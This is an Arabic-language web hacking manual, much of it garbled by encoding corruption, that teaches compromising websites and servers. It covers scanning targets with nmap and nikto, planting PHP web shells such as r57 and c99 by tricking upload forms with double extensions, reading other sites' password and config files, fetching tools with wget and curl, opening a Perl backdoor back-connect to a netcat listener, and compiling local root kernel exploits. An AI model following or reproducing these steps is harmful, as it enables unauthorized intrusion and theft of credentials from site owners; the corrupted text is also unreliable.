بسم اهلل الرمحن الرحيم

H 4 C K I N G W 3 B

ال إله إال اهلل حممد رسول اهلل

هـ1431\6\9

اال ػ١ى نؼح اهلل تهواذح

اؽك هلل نب اؼا١ اظالج اال ػ أشهف األث١اء اه١

.ث١ا ؽك ػ آ طؽث ه ث١ إ ٠ اك٠

ا الػ ا إال تا ػرا اه أد ػال اغ١ب

تؼك,,, ذؽ١ح ؿ١ثح

فمك لد تؼ اىراب اؽك هلل األن ١ه و ما ترف١ك اهلل

اؽك هلل ػ و شء تكا٠را أذا ػك ارفكا أ ؼح نقخ ف

ما اىراب ف أل٠ح ا١ كف ػ ما اىراب افائكج ى

أـا ا١ ٠رى ما اىراب أنتغ فظي و فظ ٠فرف

ػ األـه ٠ر١ى و فظ ػ األـه تـهل أا١ث افظ األي اؽ١

ارفكح ؼاخ ؼي و١ف١ح االـرهاق افظ اصا أا١ة اـرهاق

االغ و١ف١ح اؽظي ػ شغهاخ الغ افظ اصاس أ األاه

ارفكح ف اـرهاق االغ أ ارفاط١ ؼي ذفـ ا١ف ق

افظ اهاتغ ا١ـهج ػ ا١هفه أ األقاخ ارفكح اؽظي

قػا م تعح ػ اىه ؿهق أا١ة افرهق ف , rootػ

التك اال ا ذرؼ أا١ة افرهق ف اـرهاق كف ,ػ١ح امهطح

ؼ١ ػ ث١ اصاي أنقا ا فرهق لغ ؼ١ التك ظغ

ؼاخ اال ػ اكف ٠أذ قن افرهق تعغ اؼاخ ػ

اكف ص ظق شغهج ف الغ ا إ لاه ش ٠م تاع تم

اؼاخ ػ الغ ىما اذا ى ارؼح افائـكج

حمتويات الكتاب افظ األي

خع اعاث

serverاظ١زفز

types serverأاع اظ١زفزاث

shellاش

r57.phpشزذ ش

Uploadزاوش اخس١

trickeryاخسا٠

trickery2اخسا٠

scriptاظىزبج

Vulnerabilitiesاثغـزة

غاث ابزدت

األخطاء ابزد١ت

:.جع اعاث .: تكا٠را ذظك الغ ذم تؼهع اؼاخ ػ اكف

ص إ١٠ طاؼة الغ ع ام اظا ارفك

http://www.netcraft.net/

http://www.whois.com/

Nmapؿ١ة ا٢ م تـه٠مح أـه تعغ اؼاخ ػثه أقاج

اافمرفهاض ا م األقاج ذم تػ الغ جظ١ف

ج ظ١غ اؼاخ ار لوها اتما ص ع ام افرغ

أ١٠ طاؼة الغ اافم افرؼح ع اظا ظ١ؼا

ظكا ف ػ١ح االـرهاق إ شاءاهلل

niktoؿه٠مح أ٠ؼا أـه تعغ اؼاخ ػثه أقاج

الو ذفرف ف nmapظ١فح م االقاج ذم تف أقاج

اث١هي ذظ١ث perlارفكاا أ اا ذؽراض رهظ غح

ػ ظاون الذم تػ اثنذاخ ف الغ اؼ١

ف أل تشهغ م األقاخ ف افظ اصا طثها ظ١

اهلل ارف١ك

:.اغ١شفش .: ظاو ارؼ١ف لغ ذى فاخ الغ ذظك ف١ ظاو

وث١ذه ػاق الو تاطفاخ غ١ه اعاو اؼاق وص ام ذرفك

اطفاذ وىثه ؼع امهص ف١ هػر ائ

24 اػ ما ثة و االغ شغـا 24ا٠ؼا رظ تاإلرهد

ما , اوصه لغ اؼك (ا١هفه) serverـاػ ٠رؼ١ف

٢ـه شهوح ٢ـه server ٠ؼرك

ظ١فر serverػهفا الا ٠مظك تـ

:.أاع اغ١شفشاث .:

ذفرف ١هفه إ أـه (ا١هفهاخ)

ا غ١ها xp or linunxاألـرالف ٠ى تاظا إا ا ٠ى

األظح الو ا٠ا ا

ا١هفهاخ ار ذهوة اظا م شائؼ ا١ى او ت

ف رـهق تئل اش ف األو ت ا١ىذفرف أاه و

اهلل أاه و ا١ى االو ت اشـ

اثة ف لاه ١١ىالو غاثا ا٠ى ا١هفه

اهلل ٠ى ؼا٠ح ١هفه طؼتح إـرهال وا ٠ىػ الو تئل

ا١هفه أـرهاق اؼ١ح ػائك ان ذى

(األوض ب) (ا١ىض)ذا ادذي أاز و

:.shellاشـ .:

وق ـث١س ا ف ذع ثهط تـه٠مح ذػ /تظـػ اىه

طالؼ١ره ـه تارظهف تالغ الو ؼة

تاث ٠ؼرثه ما اف ا اىق فا٠هي php ثهط تغح

ؽا٠اخ

اش ٠فرف ش إ أـه ألوه تؼؼا ا اؼهف اشن

ا٠ؼا وص١هج األرفكا الو ذموه اكف اؼك ذف١م ااه افرهق

c99.php

r57.php

phpshell.php

sniper-sa.php

perl

وا لوها اتما أ١ح اش ظ١فر لا ذفرف أاػا الو اكف

اؼك ا ذـث١ك أاه افرهق ف م ترفظ١ اش ع

r57.php

:.r57.phpشهغ ش .:

safe_mode: ON

safe_mode: OFF OFF أ ONا اف ق اا ا ٠ى

ا١ى ال٠ى ذـث١ك أاه onف ؼاح ا ا١ف ق

PHP version: 4.4.9 اطكان االتاذش

HDD Free : 361.63 MB HDD Total : 11.45 GB

و١ح اىا افانؽ ا ػ ا١هفه

/home/fawazhack/public_html

نىاه ػ ا١هف

Linux 2.4.20-42.9.legacy

ع اظا

uid=512(user) gid=512(user) groups=512(user)

ا١هفهطالؼ١ره ػ

Upload files on server

هفغ افاخ إ الغ

back-connect الذظاي ػى ت١هفه ص اد واخ

( r57.php اش ع ) تؼك ا لا ترفظ١

ػكا ه٠ك أـرهاق الغ التك ظق ؿه٠مح ذىا تػغ أ نفغ

اش ف الغ ا١هفه

ا ا٠

٠ر أرغالا ف وح ارغالي ا م شغهجأا ا ذى ػثه

إ الغ اركفshellاش تهفغ

ػ١ نفغ ف اش تـهق فرفح تارؽا٠ م هوى ذؽ١أ

ألوه تؼغ ا تؼك ل١

ارا ٠مصذ بشوض حح١

:.هاوى ارؽ١ .: تكا٠را ٠ى اركاق الغ ١ى هوى ارؽ١ ف١ ىما

www. fawazhack .com/up

or

www.fawazhack.com/upload

١ تاؼهنج ١ى اهاتؾ هوى ارؽ١ واهاتؾ ااتم اا

هوى ارؽ١

فظض هفغ ف١ ص اظن php ىهتد ثهط تغح

..ا٢طاخ إ أؾ

ػك اكـي ػ هوى نفغ ؼ١

ف ذالؼظ ظق ارا

االركاقاخ اؼgif, jpg, png, bmp, psd, zip, rar

تؼك ا ػهفا الا ٠مظك تهوى ارؽ١ لا ا ىهتد ػ

الغ ٠ف١ك ف نفغ افاخ وما

trickery :.ارؽـا٠ .: اا ارؽا٠ ف ا م ترغفاي هوى ارؽ١ فصال ك٠ا ش

ه٠ك ا م تهفؼ الو ال٠ى نفؼ تاشى اظاه أاى

c99.php

م تاظه إ االركاقاخ اؼ هوى ارؽ١

,gif, jpg zip,rar

تى٠اقج اركاق غ ت phpاأل م تئػافح ألركاق اش

تهوى ارؽ١

١ى ىما C99.php.zip

C99.php.rar

C99.php.jpg

C99.php.gif

اا ا ٠م تهفؼا ا ال٠رع١ة ـة اهفغ

ػك ػك نفغ اف م تاثؽس ف ف ا١هفه ػ هوى ذؽ١

أـه م ترـث١ك افـاخ ااتم

م اـه٠م األ راؼ١ ػ هاوى ارؽ١

trickery :.ارؽـا٠ .:

:.اطش٠مت اثا١ خحا٠ .: ف اـه٠م األ لا ترغفاي هوى ارؽ١ ار١ع اا ا ٠م

تهفؼا أ ال

اـه٠م اصا١ ذؼرك ػ ظق األركاقاخ اؼح اركاق

jpg and gifاظن ا

ا٠ؼا ذؼرك ػ هوى ارؽ١ ا ٠م ترؽ١ األواق افاط

م تؿ اىق notepadتاظن اال م تفرػ طنج تئرفكا

اظاه ظنج ف افىهج ش اماب إ اش م أ٠ؼا تفرػ اش

ش م تظك اىق افاص تاش إ اظنج الو notepadتـ

ذ ل١

ػك ظك اىق إ اش التك ا ذم تؼ اف ت١ وق اظن

اش تؽ١س ال٠ثم افح ت١ وق اش وق اظنج

script :.اىهتد .: تهاط ت١ؾ ٠ؽر ػ ذؼ١اخ أاه ؽكق ذؤق ظائف ؼ١

ذفرف اىهتراخ تىراترا إ غاخ ػك ص

Bash or asp or php إ أـه اغاخ

:.اصغـهج .:

Vulnerabilities ــاء تهع ٠مغ ف الغ

٠أذ ما افـاء ثهع اثهاط اىهتراخ ٠رغا افرهق

ف اطي لغ

٠أذ قن االغ ار ذر ف ما اعاي عاي االــاء

Vulnerabilitiesاثهع١ ا اصغهاخ

اصغهاخ ا١ىن٠ر تاصغهاخ ذر م االغ

http://www.exploit-db.com/

http://www.securityfocus.com/archive/1

http://www.jaascois.com

http://www.securiteam.com

http://securityreason.com

http://www.milw0rm.com

http://www.kernel.org

http://www.ukrt.f2s.com

http://www.ussrback.com

http://www.packetstorm.securify.com

http://www.secureroot.com

http://www.rootshell.com

http://www.ussrback.com

http://www.securitydot.net

http://www.packetstormsecurity.org

م االغ و ٠ ا اثػ١ا ذػغ أـه اصغهاخ ارعكاخ ف

اثهع١اخ اظات تفـاء ا إ لاه

:.ااع اصغهاخ .: عأروش بعط أشش اثغشاث اجدة حا١ا

Jommla

File Include

XSS

Sql Injection

Buffer over flow

Joomla

ظال ا ىهتد الو ظها ظق شغهاخ وص١ه ف ما اىهتد

اقنظا ػ اصغهاخ ٠راظك ما اىهتد تشى وث١ه ف االغ

االظث١ ػك اكـي لغ ٠ؽ اىهتد ارا ف ذم تئـرهال

تئل اهلل وا لا ا ٠ظك شغهاج تما اىهتد

File Include

ما اع اصغهاخ ٠م تهفغ ا إقناض عك ـانض الغ ػثه

shellاهتؾ تعك ـانظ ا ٠أذ قن افرهق تهتؾ ف ارع

xss

أا ما اع اصغهاخ ـالا مكن ؽة و٠ىى ص األق١ أ

ػؼ ؼ١ تالغ

Sql Injection

٠م ػثه أــاء تهع١ح تئناي أاه إ لاػكج ما اع اصغهاخ

أه مهاءج ؼاخ ػؼ٠ح األق نل اؼك أ أه رغ١١ه ص اث١ااخ

اهن ٠ى تم اصغهج ؼم الغ تاش وح

Buffer over Flow

"اـفػ"ما اع اصغهاخ ذم تع ػ ا١هفه ٠ ع

٠م افرهق تاع ػ مـ ؼ١ ف ا١هفه ص اع ػ

اكف لاه إػؼاف اذظاي ا١هفه فظ ftpتنخ االف ذ ت

اذظا تما اثنخ أ أ تنخ ٠م تئرغال افرهق اثنذاخ

. افرؼح

ىخف بزا امذس اثغشاث زا اع اثغشاث اشسة

اخاجذة حا١ا بىثشة ال غ أ اثغشاث وث١شة جذا

:.غاخ اثهعح .: ألوه ا اشه م اغاخ تهع ٠ظكن ثهط م اغ ــاء فاقغ ٠رط شغهج

٠ر ارغالا ػ ؿه٠ك افرـهق

ماييل تومن هذه اللغا

phpغت

cغت

perlغت

htmlغت

pythonغت

Rubyغت

م اغاخ أ اغاخ اظقج ؼا١ا ت١ اثهع١ ذعق

غاخ أـه وص١هج ى لد تعغ أفؼ اغاخ اشائؼح

ارا ٠مصذ باألخطاء ابشج١ت

:.األــاء اثهع١ح .: ا ــاء ٠ظكن ػاقذا ك٠ه الغ ص ارؼك٠ ػ اىهتراخ

ػك ذظفؽه لغ ؼ١ , ٠رط ما افـاء phpأذؼك٠ ف تئركاق

ا رك ف ذالؼظ ظق ــاء وا ف اشى ارا

الؼظ ٠رى ان ما اان ٠كا ػ ىا افـاء

Home/aqaedcom/public_html/shia_news/detail

ف أل تشهغ أظىاء افـاء ارا

home

اي عك ررط ا ٠مغ ف١ عكاخ فاخ االغ ار ػ ف ا١هفه

aqaedcom

اا اعك ارا ا ٠ون الغ تئىاا ارف١ إ ا ظ إ ؼح

ارؽى ت

public_html

اا اعك ارا ا ٠ؽر ػ ظ١غ فاخ الغ ىهتراخ ا إ

لاه

افص اثا

find in errorsابسث ع األخطاء

find sicreptsابسث ع ثغزاث اظىزبخاث

niktoإظار وافت اعاث اثغزاث بالع بظخخذا أداة

Shadow Security Scannerظر االع بظخخذا بزاح

Intelli tamperأطخخزاج دذاث الع اظخذف عبز بزاح

:.البحث عن األخطاء .:

Find in errors

ؿه٠مح اثؽس ػ االــاء ذؼرك ػ١ه ف اثؽس ػ ا١هفه

الغ م تاماب إ ip تك٠را م تئرفهاض

Start ش اماب إ run ش م تػغ األهcommand ا

cmd ش ذفهض ا شاشح اكي أ ظح اكي م تػغ األه

ping fawazhackارا

ناتؾ الغ اركفfawazhackغ اؼ ا

ipػك ػغ ما األه الؼظ ظق

ـاص تا١هفه اكف لاه فؽض الغ ػثه اـه٠مح ipما

ارا١

اظق تظح األاه ipل تؿ

ألة إ إؼكا االغ ارـا١ـ

www.bing.com or www.msn.com

غ امـرا :ipش ل تػغ وح

١ظثػ ىما

ip:123:123:123

الغ اركف ip 123:123:123غ اؼ أ

ػ ف ا١هفه م االغ ار لا تئرفهاض الغ أاالؼظ

ؽظي ػ األــاءاؼك م ا٢ تىراتح تؼغ ١هفهظ١ؼا ػ

أرغالــاء ؼ١

##################Errors##################

# error #

# public_html #

# mysql #

# warning #

##################Errors##################

أ اثؽس ػ هاوى ذؽ١ م تارؽا٠ ػ١ا وا لوها اتما ؿه٠مح

ارؽا٠

Upload

أ م تىراتح تاؼهت١ح

هوى ذؽ١

:.البحث عن ثغراث السكربتاث .:

ف م اـه٠مح ف م تاثؽس ػ شغهاخ اث ىهتراخ

شنج ص

Wordpress IP.Board

Phpld phpbb

Joomla Infinity

php-fusion vBulletin

smf ibd

XMB WHMCS

4smart Burning Board

Almnzm Arab Portal

Discuz! 6.0 W eb2.0

Flash Chat IP.Board

coppermine 4images

ا١هفهip ػؼا تؼك bingتؼك اثؽس ػ م اىهتراخ ف لغ

م تاماب إ إؼك الغ اصغهاخ لك لوها ص م االغ

http://www.milw0rm.com

ش م تارظ إ ـاح اثؽس

http://www.milw0rm.com/search.php

ؼغ أ اىهتد ام ظكا ف ا١هفه م تاظه إ شغهاذ

ذـث١ما ؼر اطي إ ر١عح

:. إظهار كافت الوعلىهاث والثغراث بالوىقع .:

niktoبستخذام أداة

تا٠ اؼا إظان ؼاخ الغ اصغهاخ : ظ١فح م األقا

perlا ثهط تغح اث١هي فماه ؽراض رهض غح اث١هي

م ترؽ١ األقا ا

http://cirt.net/nikto/UPDATES/

غ اؼ ا ما الغ ٠ر تاألقا ٠م و ك ؼ١ ترؽك٠س إػافح

شغهاخ ظك٠كج ألقا ل ترؽ١ أـه إطكان م األقا الغ ارا

تؼك ذؽ١ األقا م تػؼا ف عك غح اث١هي ص األركاق ارا

C:/perl/bin/nikto

ؿه٠مح ذشغ١ االقا

م تاماب إ ظح اكي ش ؼغ األه ارا

Cd\

ش األه االـه

Cd perl/bin

ش

Cd perl/bin/nikto

ش ؿه٠مح ارشغ١ أال م تػغ االه

Perl nikto.pl

ما األه ػ١فر ٠م تاظان ـ١اناخ األقا

الو ا٠ا ت١ م األاه أه

-host

األ م تػغ األه واال

Perl nikto.pl –host www.fawazhack.com

تؼك ػغ األه ارا ف ذه ا لا تاظان ع ظا ارشغ١ أ٠ؼا

ؼاخ اـه dnsاطكان ؼاخ ؼي اك ا اي

إظان اصغهاخ تالغ

:.هسح الوىاقع بستخذام برناهح .:

Shadow Security Scanner

أال ظ١فح ما اثهاط ٠م تػ الغ إظان اصغهاخ األاو

اؽاح ف الغ أ ماؽ اؼؼف تؼك ذصث١د اثهاط

New sessionم تاؼغؾ ػ

ف ذأذ اشاشح ارا١ح

nextم تاؼغؾ ػ

add hostش

:name or ipف م اشاشح م تئػافح أا

ناتؾ الغ اركف أ إ٠ث ا١هفه

addم تؼك إػافح الغ اركف م تاؼغؾ ػ

تؼك إػافح ناتؾ الغ الؼظ اظنج ارا١ح

next ٠ظك الغ اركف تؼك لاه hostالؼظ ف لائح

start scanتؼك لاه م تاؼغؾ ػ

ف ٠م اثهاط تػ الغ إلا وا ف الغ شغهاخ ف

ذأذ ػ اشاي اظنج األـ١هج ف افاح ا١ه

:.أستخراج هدلذاث الوىقع الوستهذف .:

Intelli tamperعبز بزاح

افائكج م اـه٠مح م تئرفهاض عكاخ الغ اىهتراخ

اهوثح ػ ما الغ م ترؽ١ أ٠ؼا افاخ ار ذر تئركاق

ش م ترؽ١ا فؽظا تأرفكا تهاط phpغح اثهعح

notepad++ اثؽس ػ شغهاخ تؼك ارغ١هاخ $

افظـ اصاس

linunx and win xpاخفز٠ك ب١ أاز

command in shellاألاز اظخخذت ف اش

أاز اضغط فه اضغط _

أاز اخخزق اذاخ١ت _

أاز اخخزق اخارخ١ت _

اصالز١اث

شزذ اصالز١اث

Permissionsاخصار٠ر

أشىاي اخصار٠ر _

اخفز٠ك ب١ ادذ اف _

Safe_mode: ONحخط اظ١ف د

userلزاءة افاث بصالز١ت ٠سر

connect backdoorاالحصاي باظ١زفز ع طز٠ك اباوذر

:.Linux and Win xpاخفش٠ك ب١ أاش .:

ف اجذي اخا بعط أاش و ا١ىظ االوظ ب

linuxاجت ا١ ااش

xpاا اجت ا١غش أاش

Xp Linux

ىرف تما اعكي أاه و ا١ى االو ت م األاه

ارفكح ف وال اظا١ األاه وص١هج الو م األاه

أألا١ح ف اظا١

:. األاش اغخخذ ف اش.:

Linux

أا األاه ارفك ف اش ػ ؼة ا١هفه إا ا١ى أ أو

ت اؼاقج ٠ى ا١هفه ظا ١١ى ماه ف أل تشهغ أاه

ا١ى

أواهر اللينكس تقسن إلى ثالثت أقسام هنها

أواهر الضغط وفك الضغط_

أواهر الهكر الذاخليت_

أواهر الهكر الخارخيت _

:. األاش اغخخذ ف اش.:

Linux أاش اعغط فـه اعغط

بشى خخصش حف١ذ ز األاش ف حخط حا٠ت اغ١شفش أ غشض اء ف أعخخذاا

أاز اضغط فه اضغط

ظ١فت األز األز وخابخا ثاي ع األز خض١ر

qzip failname qzip zip أز اضغط باخذاد

unzip failname unzip zip از فه اضغط باخذاد

tar -zcf zz.tar daily tar -zcf tar أز اضغط باخذاد

tar -zxf zz.tar tar -zxf tar أز فه اضغط باخذاد

tar -czvf file name.tar.gz file name.sql tar -czvf gz أز ضغط اف باخذا

gzip -d file.gz gzip -d gz فه اضغط باخذاد

tar -czvf file name.tar.gz file name.sql tar -czvf و١ف١ت ضغط لاعذة اب١ااث

tar -zxvf file name.tar.gz tar -zxvf و١ف١ت فه لاعذ اب١ااث

tar -czvf /home/fawazhack/public_html/n3.tar.gz n3 tar -czvf tar.gz ادذاث باخذاد از ضغط

:.األاش اغخخذ ف اش .:

Linux أاش اخخشق اذاخ١ت

ا مف ل١ال خأ ف وج اذاخ١ت ف ذ اىت أ األاز

اظخخذت ف ادذي أدا حف١ذ ف اخخزاق الع اذ زفع ع١ اش

أ دذ الع

اذاخ١تاخخزقأاز

ظ١فت األز األز وخابخا ثاي ع األز خض١ر

Ls Ls اطخعزاض افاث

Ls ls –la اطخعزاض افاث ادذاث اخف١ت

اخصار٠ر

Pwd Pwd حسذ٠ذ اىا عاظ١زفز

ls;pwd ; اداة ازبط ب١ األاز

wget http://www.fawazhack.com/ll.zip;ls ll* Wget أزاظسب

curl -o ./ll.zip http://www.fawazhack.com/ll.zip;ls ll* curl -o ./ از اظسب ا٢خز

History History أز عزفت خ١ع األاز اخ فذث باش

mkdir alkasr Mkdir اشاء دذ خذ٠ذ

rm failname Rm أز اسذف

rm -r dir rm –r زذف دذ بد١ع افاث

edit failname Edit أز اخعذ٠

Who Who از اخص١ ع اظ١زفز

Cd Cd از دخي ادذاث

cd .. cd .. از اعدة خف

Mv Mv از اعادة اخظ١ت

Find Find از ابسث

أز حشغ١ ابان در ./ ./

uname –a uname -a أز عزفت اصذار اظ١زفز

ls ftp.zip* * از ٠ز ى

man ls man از اظاعذة

drwxrwxrwx chmod 777 dd chmod أز إعطاء اخصز٠ر

touch alkasr.php touch أز اشاء ف فارغ

gcc alkaser.c -o fawazhack Gcc حزخت اىبا٠ ا االوظب٠ج

usr/bin/perl فاث اب١زي حبذأ بــ ال ٠سسخاج حزخت ٠بذأ اىد بذ اىت

include فاث اظ حبذأ بــ ترجمة وتشغيل فقط ٠بذأ اىد بذ اىت

:. األاش اغخخذ ف اش.:

Linux أاش اخخشق اذاخ١ت

عزض ف م األاه ذف١كا ف ارم اؽة لهاءج االغ األـه

.خ١ع االع اخ ع اظ١زفز

أاز اىز اخارخ١ت

ظ١فت األز األز وخابخا ثاي ع األز خض١ر

cat /home/*/public_html/_vti_pvt/access.cnf cat عزض خ١ع االع اخ ع اظ١زفز

cat /home/*/public_html/_vti_pvt/service.pwd cat عزض خ١ع اباطرداث ع اظ١زفز

cat /usr/local/apache/conf/httpd.conf cat عزفت عزض صذر اظ١زفز

find / -name httpd.conf find عزض اصذر

more /etc/userdomains more CAT از شابت ألز

pico /home/burst/public_html/index.html pico حسز٠ز اصص

vi /home/burst/public_html/index.html vi از حسز٠ز ب اىث١ز اشا٠ا ى اصعب

اظابك

valiases ا ؽكق ls -la /etc/valiases ls ؼهفح االغ ا ػ ا١هفه غ ا١ون

ls /var/named ls ؼهفح ظ١غ االغ ا ػ ا١هفه

valiases ا ؽكق ls /usr/local/psa/home/vhosts/ ls ؼهفح ظ١غ االغ ػ ا١هفه

perl fawazhack.pl perl ذشغ١ اث١هي

cat /etc/passwd اتؽس ػ bash cat اه ارفهاض ؼاتاخ اش

:.ارظان٠ػ .: Permissions

افاخ اعكاخ ار ٠ؼؼا اه الغ ا ا١هفه اؼك ـظائض

اؽا٠ر ػ فاذ

ػ ارهاـ١ض ٠ؼؼا ك٠ه ا١هفه ػ فاذ ؽا٠ ػك طي

ا تشى وا اـه م افاخ ال ٠رـ١غ األرفاقأ رفك

ارظان٠ػ ذرى ػ اؽ ارا

اف فمؾ ق أ ذؼك٠ ذظان٠ػ ذىه لهاءج ؽر

ف صػ ا ن٠ػ ٠ىه فؼ اذه٠كاذض

لهاءج اف ا ارؼك٠ ػ١ ا اؿ ا ذشغ١ ا م ا ؼمف

ذظان٠ػ ذؼه فؼ افاط١ر١ ااتمر١

:.أشىاي ارظان٠ػ .: ٠رغ١ه نل شالز ـااخ ٠ظك ى ذظه٠ػ نى ؼ١ ال

777 :ما اؼك ارظان٠ػ

rwxrwxrwx- افاخنى ػ

drwxrwxrwx اعكاخنى ػ

777 الؼظ اظنج ارا١ ف اش ٠ؽ ذظان٠ػ

وا ف اشى ارا ف اظن الؼظ افاخ تعاثا ارظان٠ػ

.fawazhack.php : ف Hacker : عك

م طنج أـ اؼى٠ى رؼهف اى٠ك ػ ارظان٠ػ

:. ارفه٠ك ت١ اعك اف .: عك الؼظ hacker:افهق فمؾ ف األركاق ف اش وا لوها اتما ا اعك

:ا ال٠ظك اركاق افاخ قائا ذى ا أركاق وا لوها اتما أ٠ؼا اف

fawazhack.php ف اش

:.شهغ اظالؼ١اخ .: ؼهفح طالؼ١اذه ف اش أظه أػ اش وا ف اظنج ارا١ح

( id ) أ ل تئرفكا أه ؼهفح اظالؼ١اخ

run commandف ـاح

ف ذظه ارائط

uid=512(user) gid=512(user) groups=512(user)

ىما ػهفا ا٠ ذمغ اظالؼ١اخ

ارا ٠مصذ باصالح١اث

:.شهغ اظالؼ١اخ .: ػك نفغ اش إ أؼك االغ ان ل١ق رفكاه اش

User: طالؼ١اخ

م اظالؼ١اخ ال٠ى لهاءج لغ أـه

ذمرظه ػ الغ ام هفع ػ١ اش فمؾ

شىا ف اش

uid=512(user) gid=512(user) groups=512(user)

nobody: طالؼ١اخ

م اظالؼ١اخ تئىاه ارم أ٠ؼا لهاءج فاخ االغ ار ػ ف

ا١هفه تئىاه ارؼك٠ ػ١ا إلا واد ظهؼ

شىا ف اش

uid=99(nobody) gid=99(nobody) groups=99(nobody)

apache: طالؼ١اخ

nobody تاظالؼ١ شث١ح اظالؼ١ م

شىا ف اش

uid=404(apache) gid=404(apache) groups=404(apache)

root: طالؼ١اخ

م اظالؼ١اخ ذؼ ك٠ه ا١هفه ٠ه ظ١غ اظالؼ١اخ ٠ى

ارؼك٠ ػ فاخ االغ ا٠ؼا تئىا ارظه٠ػ آ ف وا

شىا ف اش

uid=0(root) gid=0(root) groups=33(root))

:. ذفـ ا١ف ق .: ػك إـرهاق لغ ؼ١ نفغ اش ف ذعك آ ا١ف ق فؼاي ا

٠ؼـ اىص١ه أاه ا١هفه و١ف ؼهف أ فؼاي ف اش الؼظ أػال

ف ذعك اى ارا١ ١ف ق

Safe_mode: ON

أ٠ؼا ف م اؽا ال٠ى ذـث١ك أاه ا١ى

php.iniاؼ رفـ ا١ف نفغ ف

ف اش Upload ؿه٠م اهفغ ـ١ان

جالؼظ ار١ط refresh تؼك اهفغ ل تؼ ذؽك٠س

م ؿه٠مح ذفـ ا١ف ق ألا وا فؼاي

:.user بصالح١ت افاث لشاءة.:

وا شهؼا اتما ف شهغ اظالؼ١اخ ا طالؼ١اخ ا١ون ؽكق

االغ ت١ ارم ذؼه ظكا

الو اـه٠مح ارا١ إ شاءاهلل ف رفـاا تـه٠م ظ١ك م

تمهاءج ؽر الغ اركف ػ ف ا١هفه

symlink اااال م اـه٠مح ذؼرك ػ قاح

ارظفػ رؼهػ إ اش sym2م تهفغ اىهتد

شا١ا م تئؼؼان ا١ون لغ اركف ف ف ا١هفه

ام نفؼا ف اش م تػغ اؼاخ االو sym2ف اىهتد

اش ع١ از شفع الع ٠صس م بظع :اال اخات

اذف الع ٠صس عع :اثا١ت اخات

اغىش٠بج ع١ سافع١ ا اجذ اع عع :اثاثت اخات

واال لشاءح اشاد اف غاس عع :اشابعت اخات

ام ٠ؽر ػ اث١ااخ ار config ف ٠أذ تفاخ اىفك

ذىه ف اـرهاق الغ اركف ػ ف ا١هفه

:.در االحصاي باظ١زفز ع طز٠ك ابان.:

connect backdoor

اثان قن تاؼهت١ح ٠مظك تا تاب ـف ف ا تئىاا ػ تاب

ـف تا١هفه

ظ١فر فرػ فم تا١هفه اإلذظاي perlاثان قن ثهط تغح اث١هي

ت

ذشغ١ اثان قن

2121اال اثان قن ٠فرػ فم

واخ اد 2121 اثنخ ػ رظد هغ

م تارظد ػثه ارفكا األه ارا ف ظاوا

nc -v -l -p 2121

إ اش وا لوها اتما ؿه٠مح اهفغ backdoor.plم تهفغ

اش

م تػغ االه ارا ف ـاح األاه وا لوها اتما أ٠ؼا

perl backdoor.pl ip 2121

:ip نل اإل ت افاص تعاون

ش ل تاماب إ اد واخ

ف ذالؼظ ا ذ االذظاي

افص ازابع

root in serverأ طزق اسصي ع صالز١اث ازث

local rootاواي رث

اخفز٠ك ب١ اواي اخزخ اغ١ز خزخ _

find localrootابسث ع واي رث _

netcat االحصاي باظ١زفز عبز اج واث

rootاسصي ع ازث

حثب١ج ازث و١ج ع اظ١زفز

ع اص د٠فض

ظر أثزن اظ١زفز

:.أ طشق احصي ع صالح١اث اشث .:

Root in server

بذا٠خا البذ عشفت طشق احصي ع صالح١اث اشث حجذ عذث طشق

,,ألخز سث ف اغ١شفش ـا

ع طش٠ك اواي سث اعخغالي ثغش بى١ش اغ١شفش .1

ع طش٠ك اعخغالي ثغشاث ابشاج اخ ع فظ اغ١شفش ا اشوب ع١ .2

ع طش٠ك لشاءة بعط افاث اخ ٠ى ف١ا باعسد اشث .3

:.localrootاواي سث .:

اواي تهاط ثهط إلرغالي شغه تئطكان اى١ه اواالخ

ذؽراض إ ارهظح لث ارشغ١ ما أه ارهظ تؼك C ثهع تغح

نفغ اواي إ ا١هفه ػ ؿه٠ك اش

م ترف١م األه ارا

gcc local.c -o local

:.اخفش٠ك ب١ اواي اخشج اغ١ش اخشج .:

فؼهف أ غ١ه رهظ cأال إلا وا اواي أرا تئركاق

اواي ارهظ أا ا ٠ر ق أركاق ا أ غ١ه

اثة ف لاه ا اج اى١ه cذموه قائا ا اواي رهظ تغح

cف ظا ا١ى ذى ثهعح تغح ا

:.ابحث ع واي سث .: ف افظ األيذظك الغ ذر ف ما اعاي وا لوها اتما ف

تؼغ االغ ار ذر ف عاي اصغهاخ Vulnerabilitiesاصغـهج عاي

أ٠ؼا ١ا ذر ف اواالخ ا ؼغ لغ رـث١ك ػ١ ف عاي اثؽس ػ

م تاماب إ أؼك االغاواي نخ

http://www.exploit-db.com/

ػك اكـي لغ ذظك ػكخ ـ١اناخ م تاماب إ اثؽس

تؼك اكـي ػ ـاح اثؽس م ا٢ تاظه إ اش ه ع اظا

ذؽك٠ص وا ف اظنج ارا١ح

٠2.6.18ظك ع اظا ارؽك٠س uname –aالؼظ أا

م األ تػغ ف ـاح اثؽس ف الغ

Local 2.6.18 ا localroot 2.6.18ا

local root exploit 2.6.18

وما تئل اهلل ؽظ ػ اواي

ا تؼغ االغ

http://www.exploit-db.com

http://www.milw0rm.com/local.php

http://www.kernel.org/pub/linux

http://www.securityfocus.com

ف عايافظ األيأ ل تاهظع إ إ

Vulnerabilitiesاصغـهج

ز ص للا ػ ؿه٠ك ؽهواخ اثػlocal root exploit 2.6.18

netcat :.االحصاي باغ١شفش عبش .:

لث اؽظي ػ اواي نخ ٠ىا االذظاي تا١هفه ػثه أقاج اد

واخ م تاكـي إ ظح اكي أ ظح األاه

ش م تارظد ػثه األه ارا ف ظح اكي

nc –v –l –p port

تافم اهاق ارظد ت وا ف اظنج ارا١ح portتكي وح

ا٢ ل تاماب إ اش الة إ األفـ ف ذعك

back-connect

ف م افااخ اصالز ٠ـة

Ip ٠مظك تا إ ت ظاون

Port افم ام لد تارظد تـ

Use قػا ػ ا١ا

connectش ل تاؼغؾ ػ

لة إ اد واخ ف ذعك ا ذ االذظاي تا١هفه

:.احصي ع اواي سث .:

أال التك االذظاي تاد واخ

م تهفغ اواي إ ا١هفه التك نفؼ إ عك ٠ؽ ارظان٠ػ

777اىا

777أ وا اواي غ١ه رهظ م تئػـائ أ٠ؼا ارظان٠ػ اىاح

تاأله ارا

chmod 777 local.c

م تؼك إػـائ ارظان٠ػ اىاح ترهظر تاأله ارا

gcc local.c –o local

localتؼك ػغ األه ارا ذ ذهظح اواي ف ذعكج وارا

ق اركاق وا لوها اتما

ش م تئػـاء اواي ارهظ ارظان٠ػ اىا chmod 777 local

م ا٢ ترشغ١ اواي تاأله ارا

local./

